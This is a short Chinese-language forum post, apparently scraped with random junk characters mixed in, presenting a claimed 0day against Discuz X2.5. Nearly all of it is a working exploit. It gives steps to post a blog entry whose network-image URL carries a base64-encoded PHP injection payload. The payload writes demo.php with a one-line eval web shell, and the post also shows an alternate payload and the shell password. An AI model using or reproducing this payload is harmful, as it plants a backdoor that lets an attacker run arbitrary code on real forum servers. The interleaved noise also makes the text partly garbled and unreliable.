DZ X2.5最新0day6 P" v* W- p' q/ S+ ]0 E, {! U+ r5 D
1.注册任意账户+ ?, ^( Y7 M0 j$ g) S* {
2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了5 }3 j4 b; _% p% [! v% X! O Z$ j
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码2 G9 z0 \- T4 p8 | B+ c
<?php @eval($_POST[c]); ?>ok
4 c0 y' l4 O" q1 K. y) R<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?> 6 W9 ^- d$ R4 t- _5 A6 g& {6 u' c
4.访问日志,论坛根目录下生成demo.php,一句发密码C |